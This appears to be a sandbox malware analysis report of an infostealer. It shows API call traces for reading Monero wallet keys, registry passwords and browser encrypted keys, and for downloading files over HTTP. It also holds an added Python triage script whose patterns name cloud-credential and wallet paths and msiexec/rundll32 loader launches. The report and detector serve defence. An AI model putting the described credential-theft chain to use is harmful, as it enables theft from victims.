                  • Opcode Fuzzy Hash: 1c350f073c42f5726946c59e7ecf721752690e59babaf62850720d0bc3154050
                  • Instruction Fuzzy Hash: 28121D718111089ADB09FBA0DD92FEDB738AF15310F504169F50676192EF346BCAEFA2
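The two records above describe behaviour a defender can correlate per process: the credential-store walk over `\.azure\`, `\.aws\` and `\.IdentityService\` / `msal.cache` (plus `\Monero\wallet.keys` from the earlier file-read record), followed by a `ShellExecuteEx` launch of `msiexec.exe /i "<payload>.msi" /passive` or `rundll32.exe` with a `.dll` argument. Reading one of these stores is routine for the az or aws CLI; one process touching several of them and then spawning an installer is not. The Python below is an added triage example written for this page; it is neither Joe Sandbox code nor the sample's own code. The event schema (`file_access` / `process_create` records with `pid`, `path`, `cmdline`, `parent_pid`) is a stand-in the reader maps from Security 4663 / Sysmon 1, the sample events are constructed, the exact msiexec and rundll32 argument layout is assumed from the string fragments in the report, and the `%LOCALAPPDATA%\.IdentityService\msal.cache` location is an assumption.

```python
"""Per-process triage of credential-store reads and follow-on msiexec/rundll32
launches. Added example for this report; the events below are constructed,
not taken from the sandbox run."""
import re
from collections import defaultdict

# Path fragments taken from the report's string tables. The msal.cache
# location under .IdentityService is assumed; the others are matched as
# fragments so the profile root does not matter.
CREDENTIAL_STORES = {
    "azure_cli":     re.compile(r"\\\.azure\\", re.IGNORECASE),
    "aws_cli":       re.compile(r"\\\.aws\\", re.IGNORECASE),
    "msal_cache":    re.compile(r"\\\.IdentityService\\.*msal\.cache$", re.IGNORECASE),
    "monero_wallet": re.compile(r"\\Monero\\wallet\.keys$", re.IGNORECASE),
}


def classify_loader(cmdline):
    """Return which follow-on execution shape a command line matches, or None.
    The argument layout is assumed from the report's '/i "', ' /passive',
    '.msi' and '.dll' fragments."""
    if (re.search(r'msiexec\.exe"?\s+/i\s+"[^"]+\.msi"', cmdline, re.IGNORECASE)
            and "/passive" in cmdline.lower()):
        return "msiexec_passive"
    if re.search(r'rundll32\.exe"?\s+"[^"]+\.dll"', cmdline, re.IGNORECASE):
        return "rundll32_dll"
    return None


def triage(events):
    """Group events by the process that performed them and score each process.

    high:   read >= 2 distinct credential stores AND spawned msiexec/rundll32
    medium: read >= 2 distinct credential stores
    low:    one store, or a loader launch with no store access (az/aws CLI
            sessions and ordinary installers land here; allowlist by image)
    """
    stores = defaultdict(set)    # pid -> store names read
    loaders = defaultdict(list)  # parent pid -> (shape, cmdline) launched
    for ev in events:
        if ev["type"] == "file_access":
            for name, rx in CREDENTIAL_STORES.items():
                if rx.search(ev["path"]):
                    stores[ev["pid"]].add(name)
        elif ev["type"] == "process_create":
            shape = classify_loader(ev["cmdline"])
            if shape:
                loaders[ev["parent_pid"]].append((shape, ev["cmdline"]))

    findings = {}
    for pid in set(stores) | set(loaders):
        hit_stores = sorted(stores.get(pid, ()))
        hit_loaders = loaders.get(pid, [])
        if len(hit_stores) >= 2 and hit_loaders:
            severity = "high"
        elif len(hit_stores) >= 2:
            severity = "medium"
        else:
            severity = "low"
        findings[pid] = {"severity": severity, "stores": hit_stores, "loaders": hit_loaders}
    return findings


# Constructed events (not from the sandbox run). pid 4120 plays the stealer,
# 5560 a legitimate az CLI session, 900 a normal installer, 7000 notepad.
SAMPLE_EVENTS = [
    {"type": "file_access", "pid": 4120, "path": r"C:\Users\alice\.azure\azureProfile.json"},
    {"type": "file_access", "pid": 4120, "path": r"C:\Users\alice\.aws\credentials"},
    {"type": "file_access", "pid": 4120, "path": r"C:\Users\alice\AppData\Local\.IdentityService\msal.cache"},
    {"type": "file_access", "pid": 4120, "path": r"C:\Users\alice\Documents\Monero\wallet.keys"},
    {"type": "process_create", "pid": 4188, "parent_pid": 4120,
     "cmdline": r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\alice\AppData\Local\Temp\upd.msi" /passive'},
    {"type": "file_access", "pid": 5560, "path": r"C:\Users\alice\.azure\msal_token_cache.bin"},
    {"type": "process_create", "pid": 912, "parent_pid": 900,
     "cmdline": r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\alice\Downloads\tool.msi" /passive'},
    {"type": "file_access", "pid": 7000, "path": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for pid, f in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, f["severity"], f["stores"], [shape for shape, _ in f["loaders"]])
```

Scoring on the count of distinct stores rather than on any single path is deliberate: a single `.azure` read is what `az login` looks like, and `msiexec /passive` on its own is what a software deployment looks like, so each alone stays at "low"; the chain of several stores from one process, then a loader launch from that same process, is the shape the report's records describe.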
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C06280: InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1
                    • Part of subcall function 00C06280: StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303
                    • Part of subcall function 00C06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335
                    • Part of subcall function 00C06280: HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385
                    • Part of subcall function 00C06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C063BF
                    • Part of subcall function 00C06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C15318
                  • lstrlen.KERNEL32(00000000), ref: 00C1532F
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00C15364
                  • lstrlen.KERNEL32(00000000), ref: 00C15383
                  • lstrlen.KERNEL32(00000000), ref: 00C153AE
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: ef67b2b86c3b94dbf22a2cdda7c5966d16b35d397263aa6cc186c3610a47423d
                  • Instruction ID: 97785829b78ab3de95390d54313a8b70ec7c8fd65b5461226a8fc71d1e1eae34
                  • Opcode Fuzzy Hash: ef67b2b86c3b94dbf22a2cdda7c5966d16b35d397263aa6cc186c3610a47423d
                  • Instruction Fuzzy Hash: 0E510C30911148DBDB14FF61CD96AED7779AF52310F504028F8066A5D2EF34AB86FBA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 0b87de4a8f35e14c417596f216906f7ac0ee15198641f1097a6d880ec86ee48f
                  • Instruction ID: b6648d8a502cfe8c40eb7c60a1b0d172060feb2b173fcf4e2a30dc0f00ac0000
                  • Opcode Fuzzy Hash: 0b87de4a8f35e14c417596f216906f7ac0ee15198641f1097a6d880ec86ee48f
                  • Instruction Fuzzy Hash: 20C1C5B59412099BCB14EF60DC89FEE7378BF55300F044498F50A67282DA74EAC9EF91
                  APIs
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C142EC
                  • lstrcat.KERNEL32(?,0179E718), ref: 00C1430B
                  • lstrcat.KERNEL32(?,?), ref: 00C1431F
                  • lstrcat.KERNEL32(?,0179E4D0), ref: 00C14333
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C18D90: GetFileAttributesA.KERNEL32(00000000,?,00C01B54,?,?,00C2564C,?,?,00C20E1F), ref: 00C18D9F
                    • Part of subcall function 00C09CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C09D39
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C193C0: GlobalAlloc.KERNEL32(00000000,00C143DD,00C143DD), ref: 00C193D3
                  • StrStrA.SHLWAPI(?,0179EC48), ref: 00C143F3
                  • GlobalFree.KERNEL32(?), ref: 00C14512
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09AEF
                    • Part of subcall function 00C09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C04EEE,00000000,?), ref: 00C09B01
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09B2A
                    • Part of subcall function 00C09AC0: LocalFree.KERNEL32(?,?,?,?,00C04EEE,00000000,?), ref: 00C09B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00C144A3
                  • StrCmpCA.SHLWAPI(?,00C208D1), ref: 00C144C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C144D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00C144E5
                  • lstrcat.KERNEL32(00000000,00C20FB8), ref: 00C144F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 11fc068dab39601ed7bf7c512a93e77d0ec979df7107797a3947554f830defd9
                  • Instruction ID: 678c31bc146e0dfde91004a77f5c9a05de5ffbdad480475b5f43129be1fab459
                  • Opcode Fuzzy Hash: 11fc068dab39601ed7bf7c512a93e77d0ec979df7107797a3947554f830defd9
                  • Instruction Fuzzy Hash: CF7158B6D00218ABDB14EBE0DC8AFEE7379AF49310F044598F605A7181EA74DB49DF91
                  APIs
                    • Part of subcall function 00C012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C012B4
                    • Part of subcall function 00C012A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C012BB
                    • Part of subcall function 00C012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C012D7
                    • Part of subcall function 00C012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C012F5
                    • Part of subcall function 00C012A0: RegCloseKey.ADVAPI32(?), ref: 00C012FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0134F
                  • lstrlen.KERNEL32(?), ref: 00C0135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00C01377
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C01465
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00C014EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: e87bb94ff685d268bd4596325335898a15d914793306af7b74a1af71397fe2a9
                  • Instruction ID: 2e491b40839026b55bd7c2a9717e5bb7cd44242c3669930b718c61e8aa986d4c
                  • Opcode Fuzzy Hash: e87bb94ff685d268bd4596325335898a15d914793306af7b74a1af71397fe2a9
                  • Instruction Fuzzy Hash: 5C5154B1D501185BDB15EB60DD96FED733CAF55310F4041A8B60A620C2EE306BCAEFA6
                  APIs
                    • Part of subcall function 00C072D0: memset.MSVCRT ref: 00C07314
                    • Part of subcall function 00C072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C0733A
                    • Part of subcall function 00C072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C073B1
                    • Part of subcall function 00C072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C0740D
                    • Part of subcall function 00C072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C07452
                    • Part of subcall function 00C072D0: HeapFree.KERNEL32(00000000), ref: 00C07459
                  • lstrcat.KERNEL32(00000000,00C217FC), ref: 00C07606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C07648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00C0765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C0768F
                  • lstrcat.KERNEL32(00000000,00C21804), ref: 00C076A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C076D3
                  • lstrcat.KERNEL32(00000000,00C21808), ref: 00C076ED
                  • task.LIBCPMTD ref: 00C076FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: dc41f08a493d9c3901bfc7a4c8abc3623c2127bf37f2c01ab92572630580285d
                  • Instruction ID: 9633c066a9539a1ee6f58104bbff1ac8a3cded1febfdc0e19446b9741836f994
                  • Opcode Fuzzy Hash: dc41f08a493d9c3901bfc7a4c8abc3623c2127bf37f2c01ab92572630580285d
                  • Instruction Fuzzy Hash: D1314BB9D40109DFCB08EBE5DC9ADFE7378EB49311B184128F102B7290DA34A94BDB51
                  APIs
                  • memset.MSVCRT ref: 00C07314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C0733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C073B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C0740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C07452
                  • HeapFree.KERNEL32(00000000), ref: 00C07459
                  • task.LIBCPMTD ref: 00C07555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: 4764e14e703d5993d576d643ced5fcec03409a7f6e5e4e13707248bd3e2a0950
                  • Instruction ID: ec53058d47f162181828f91010ea5069d5742d1f835cd1fb1fc2aa7f99d8a7d2
                  • Opcode Fuzzy Hash: 4764e14e703d5993d576d643ced5fcec03409a7f6e5e4e13707248bd3e2a0950
                  • Instruction Fuzzy Hash: AE613BB5C042689BDB24DB50CC45BDAB7B8BF48304F0081E9E689A6181DF706FC9DFA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0179E5B8,00000000,?,00C20E2C,00000000,?,00000000), ref: 00C18130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C18137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C18158
                  • __aulldiv.LIBCMT ref: 00C18172
                  • __aulldiv.LIBCMT ref: 00C18180
                  • wsprintfA.USER32 ref: 00C181AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 123083de831672a0fe8ad7b6104cd067bacda335d66f8d8a03b1ebf55167a873
                  • Instruction ID: 17bc46e27d361c9b7768a2753e79a893174fb43e3aacf7570e76e0656d887d9d
                  • Opcode Fuzzy Hash: 123083de831672a0fe8ad7b6104cd067bacda335d66f8d8a03b1ebf55167a873
                  • Instruction Fuzzy Hash: 04214DB1E44218ABDB00DFD5CC49FAEB7B8FB45B10F204219F605BB280C77869059BA5
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                  • InternetOpenA.WININET(00C20DF7,00000001,00000000,00000000,00000000), ref: 00C0610F
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C0618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C061B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00C061DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C0620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00C06249
                  • InternetCloseHandle.WININET(?), ref: 00C06253
